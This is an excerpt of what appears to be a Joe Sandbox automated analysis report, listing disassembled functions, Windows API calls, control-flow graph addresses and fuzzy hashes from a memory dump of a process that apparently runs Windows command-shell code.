                                                                                          control_flow_graph 1207 7ff6a0e789c0-7ff6a0e78a3d memset call 7ff6a0e7ca40 1210 7ff6a0e78a43-7ff6a0e78a71 GetDriveTypeW 1207->1210 1211 7ff6a0e78ace-7ff6a0e78adf 1207->1211 1212 7ff6a0e8b411-7ff6a0e8b422 1210->1212 1213 7ff6a0e78a77-7ff6a0e78a7a 1210->1213 1214 7ff6a0e78aed 1211->1214 1215 7ff6a0e78ae1-7ff6a0e78ae8 ??_V@YAXPEAX@Z 1211->1215 1218 7ff6a0e8b430-7ff6a0e8b435 1212->1218 1219 7ff6a0e8b424-7ff6a0e8b42b ??_V@YAXPEAX@Z 1212->1219 1213->1211 1216 7ff6a0e78a7c-7ff6a0e78a7f 1213->1216 1217 7ff6a0e78aef-7ff6a0e78b16 call 7ff6a0e88f80 1214->1217 1215->1214 1216->1211 1220 7ff6a0e78a81-7ff6a0e78ac8 GetVolumeInformationW 1216->1220 1218->1217 1219->1218 1220->1211 1222 7ff6a0e8b3fc-7ff6a0e8b40b GetLastError 1220->1222 1222->1211 1222->1212
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$DriveErrorInformationLastTypeVolume
                                                                                          • String ID:
                                                                                          • API String ID: 850181435-0
                                                                                          • Opcode ID: e1379ede723eac65afdf39bc4f10c7cd7bacbf823c50ad72477e63a898fb5baf
                                                                                          • Instruction ID: 3581676da88748d104d0f941d65adfd7c04153bab424961cd1bb198314b1ec49
                                                                                          • Opcode Fuzzy Hash: e1379ede723eac65afdf39bc4f10c7cd7bacbf823c50ad72477e63a898fb5baf
                                                                                          • Instruction Fuzzy Hash: 2D418E32609BC2DAE7708F20D8442E9B7B4FB89B45F544135DA4D8BB48CF38D549D700
                                                                                          Function 00007FF6A0E84A14 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1224 7ff6a0e84a14-7ff6a0e84a3e GetEnvironmentStringsW 1225 7ff6a0e84a40-7ff6a0e84a46 1224->1225 1226 7ff6a0e84aae-7ff6a0e84ac5 1224->1226 1227 7ff6a0e84a59-7ff6a0e84a8f GetProcessHeap HeapAlloc 1225->1227 1228 7ff6a0e84a48-7ff6a0e84a52 1225->1228 1229 7ff6a0e84a91-7ff6a0e84a9a memmove 1227->1229 1230 7ff6a0e84a9f-7ff6a0e84aa9 FreeEnvironmentStringsW 1227->1230 1228->1228 1231 7ff6a0e84a54-7ff6a0e84a57 1228->1231 1229->1230 1230->1226 1231->1227 1231->1228
                                                                                          APIs
                                                                                          • GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF6A0E849F1), ref: 00007FF6A0E84A28
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E849F1), ref: 00007FF6A0E84A66
                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E849F1), ref: 00007FF6A0E84A7D
                                                                                          • memmove.MSVCRT(?,?,00000000,00007FF6A0E849F1), ref: 00007FF6A0E84A9A
                                                                                          • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF6A0E849F1), ref: 00007FF6A0E84AA2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: EnvironmentHeapStrings$AllocFreeProcessmemmove
                                                                                          • String ID:
                                                                                          • API String ID: 1623332820-0
                                                                                          • Opcode ID: bedbd02b2e83685aab04dae624747bec3d3f04209153fba6c5d2bef1ca8d2a3e
                                                                                          • Instruction ID: 6c5731bd2cf5a4169009e10ca608cd6828d385bd8f221c788b61ab3c621e1308
                                                                                          • Opcode Fuzzy Hash: bedbd02b2e83685aab04dae624747bec3d3f04209153fba6c5d2bef1ca8d2a3e
                                                                                          • Instruction Fuzzy Hash: 6A119E72A1AB4392DE149B62A404039BBE0FB8DF81F599039EE4E47784EE3DE8459740
                                                                                          Function 00007FF6A0E85CB4 Relevance: 7.5, APIs: 5, Instructions: 36synchronizationCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                                                                                          • String ID:
                                                                                          • API String ID: 1826527819-0
                                                                                          • Opcode ID: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                                                          • Instruction ID: 69c79ed524f9bf397835da6ba45d2db6a92f5ad21214e85c9dd1ea16f9ba29c4
                                                                                          • Opcode Fuzzy Hash: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                                                          • Instruction Fuzzy Hash: 8E016D3190A683AAE6005B24A4441B9BBB1FF8E752F545134E54F823A6DF3C94489700
                                                                                          Function 00007FF6A0E83060 Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6A0E81EA0: wcschr.MSVCRT(?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF6A0EA0D54), ref: 00007FF6A0E81EB3
                                                                                          • SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF6A0E792AC), ref: 00007FF6A0E830CA
                                                                                          • SetErrorMode.KERNELBASE ref: 00007FF6A0E830DD
                                                                                          • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6A0E830F6
                                                                                          • SetErrorMode.KERNELBASE ref: 00007FF6A0E83106
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorMode$FullNamePathwcschr
                                                                                          • String ID:
                                                                                          • API String ID: 1464828906-0
                                                                                          • Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                          • Instruction ID: 140ac910e9a6dbf823169bb0a3f970008de1033b6731bafc0565a9932178de45
                                                                                          • Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                          • Instruction Fuzzy Hash: 80311332E0A613A6E7649F25A41417EB6A0FB49B94F548235DA5EC33D0DE7DE889A300
                                                                                          Function 00007FF6A0E7CA40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset
                                                                                          • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                                                                          • API String ID: 2221118986-3416068913
                                                                                          • Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                                          • Instruction ID: 2b5cc85fcd3459605485be03ade3b720bdfcbd23ed7fc71a2e120c4f08da3648
                                                                                          • Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                                          • Instruction Fuzzy Hash: 0311E931B0A74791EB54CB65E1442B912A0BF89BE4F184335DE6ECB3D6DE3CD480A300
                                                                                          Function 00007FF6A0E7BE00 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 120COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memsetwcschr
                                                                                          • String ID: 2$COMSPEC
                                                                                          • API String ID: 1764819092-1738800741
                                                                                          • Opcode ID: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                          • Instruction ID: 7ed1a9f6bfa0e649fccef473a754143f2ea7bf535b9cc905f3fbb0799120d66a
                                                                                          • Opcode Fuzzy Hash: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                          • Instruction Fuzzy Hash: 8D516A32F0A64BA5FB789B25A8413B92295FF85B84F084036DA4DC67D7DF2CE844A741
                                                                                          Function 00007FF6A0E82EFC Relevance: 4.6, APIs: 3, Instructions: 101COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcschr$ErrorFileFindFirstLastwcsrchr
                                                                                          • String ID:
                                                                                          • API String ID: 4254246844-0
                                                                                          • Opcode ID: 053ef0ea037464bca1c3e1451370ecd30b301868f2ab00a5e1309acbdd43457e
                                                                                          • Instruction ID: 219f492d9f4d3db341910247ff5263064da078a242de427b056eb6b59c452005
                                                                                          • Opcode Fuzzy Hash: 053ef0ea037464bca1c3e1451370ecd30b301868f2ab00a5e1309acbdd43457e
                                                                                          • Instruction Fuzzy Hash: 9741CE32B0A783A6EE208B10E85437967A0FF99B94F548534DA4EC77D1EF3CE449A740
                                                                                          Function 00007FF6A0E85A68 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: _get_osfhandle$ConsoleMode
                                                                                          • String ID:
                                                                                          • API String ID: 1591002910-0
                                                                                          • Opcode ID: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                                                          • Instruction ID: 789c18de12357a51703056f8eb462a67878a1af29206af5288450d46688aac36
                                                                                          • Opcode Fuzzy Hash: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                                                          • Instruction Fuzzy Hash: 59F07A34A0B783EBE6148B20E865078BBB0FB8E722F558174D90E87331DF7CA4059B00
                                                                                          Function 00007FF6A0E8291C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: DriveType
                                                                                          • String ID: :
                                                                                          • API String ID: 338552980-336475711
                                                                                          • Opcode ID: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                                          • Instruction ID: 10c3e276709585b532891a5257c16b276d064a047a1e428d704e57ce42a55034
                                                                                          • Opcode Fuzzy Hash: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                                          • Instruction Fuzzy Hash: 23E06D7661964186E7209B60E4910AAB7B1FB8D349F941525EA8DC3724DF3CD249CB08
                                                                                          Function 00007FF6A0E85AD8 Relevance: 3.1, APIs: 2, Instructions: 93COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6A0E7CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E7B9A1,?,?,?,?,00007FF6A0E7D81A), ref: 00007FF6A0E7CDA6
                                                                                            • Part of subcall function 00007FF6A0E7CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E7B9A1,?,?,?,?,00007FF6A0E7D81A), ref: 00007FF6A0E7CDBD
                                                                                          • GetConsoleTitleW.KERNELBASE ref: 00007FF6A0E85B52
                                                                                            • Part of subcall function 00007FF6A0E84224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6A0E84297
                                                                                            • Part of subcall function 00007FF6A0E84224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6A0E842D7
                                                                                            • Part of subcall function 00007FF6A0E84224: memset.MSVCRT ref: 00007FF6A0E842FD
                                                                                            • Part of subcall function 00007FF6A0E84224: memset.MSVCRT ref: 00007FF6A0E84368
                                                                                            • Part of subcall function 00007FF6A0E84224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6A0E84380
                                                                                            • Part of subcall function 00007FF6A0E84224: wcsrchr.MSVCRT ref: 00007FF6A0E843E6
                                                                                            • Part of subcall function 00007FF6A0E84224: lstrcmpW.KERNELBASE ref: 00007FF6A0E84401
                                                                                          • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF6A0E85BC7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
                                                                                          • String ID:
                                                                                          • API String ID: 497088868-0
                                                                                          • Opcode ID: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                                                          • Instruction ID: a8c44aec8ea05b04e96e2024b8d3491570abd9875239abdf5d767c39466e4258
                                                                                          • Opcode Fuzzy Hash: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                                                          • Instruction Fuzzy Hash: D531E631F0E78366FA24EB21A4901BDA295FF89BC0F545435E94EC7B96DE3CE506A700
                                                                                          Function 00007FF6A0E83A0C Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • FindClose.KERNELBASE(?,?,?,00007FF6A0E9EAC5,?,?,?,00007FF6A0E9E925,?,?,?,?,00007FF6A0E7B9B1), ref: 00007FF6A0E83A56
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseFind
                                                                                          • String ID:
                                                                                          • API String ID: 1863332320-0
                                                                                          • Opcode ID: bab5306cd567feeb86bb0befbcdd41048a3801cd437bd301f39ca3c6803b8cd3
                                                                                          • Instruction ID: bce2ef4d6577816381a9de1f4d236266a82175bf3d6a5cb04f9427386be6c25c
                                                                                          • Opcode Fuzzy Hash: bab5306cd567feeb86bb0befbcdd41048a3801cd437bd301f39ca3c6803b8cd3
                                                                                          • Instruction Fuzzy Hash: 76012830E0A683F6EB588765A540139A6A0FF88B80B60C170D54DC3395EE2CF48AE300
                                                                                          Function 00007FF6A0E89A6C Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Concurrency::cancel_current_taskmalloc
                                                                                          • String ID:
                                                                                          • API String ID: 1412018758-0
                                                                                          • Opcode ID: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                                          • Instruction ID: 09860122d362fea8b796f8be254fdb9b3d35f5cb3d2fe6d8a396ba1c9d330b46
                                                                                          • Opcode Fuzzy Hash: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                                          • Instruction Fuzzy Hash: 4DE01261F5B707B6FE182B62684117812547F5D741F5C1470DD1D85382FE2CA4A9A310
                                                                                          Function 00007FF6A0E7CD90 Relevance: 2.5, APIs: 2, Instructions: 30memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E7B9A1,?,?,?,?,00007FF6A0E7D81A), ref: 00007FF6A0E7CDA6
                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E7B9A1,?,?,?,?,00007FF6A0E7D81A), ref: 00007FF6A0E7CDBD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
